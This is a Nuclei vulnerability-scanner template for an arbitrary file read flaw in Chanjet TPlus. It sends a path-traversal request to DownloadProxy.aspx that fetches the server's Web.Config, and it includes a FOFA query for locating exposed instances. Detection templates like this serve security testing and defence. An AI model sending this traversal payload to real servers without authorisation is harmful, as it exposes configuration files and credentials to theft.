id: chanjet-tplus-file-read

info:
  name: Chanjet TPlus DownloadProxy.aspx - Arbitrary File Read
  author: SleepingBag945
  severity: high
  description: |
    Chanjet TPlus DownloadProxy.aspx file has an arbitrary file reading vulnerability. An attacker can obtain sensitive files on the server through the vulnerability.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20DownloadProxy.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="畅捷通-TPlus"
  tags: yonyou,chanjet,lfi,tplus

http:
  - method: GET
    path:
      - "{{BaseURL}}/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "xml version"
          - "<configuration>"
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"
# digest: 4a0a004730450221008720a3e6a1eca6fb2e8482378bc26b84a8f245b3dd788a4938e0b1f4236dd26d0220510948128d4d6b9e61fac31a5b764424ae05f1eab773a428b3914aabd504e9fb:922c64590222798bb761d5b6d8e72950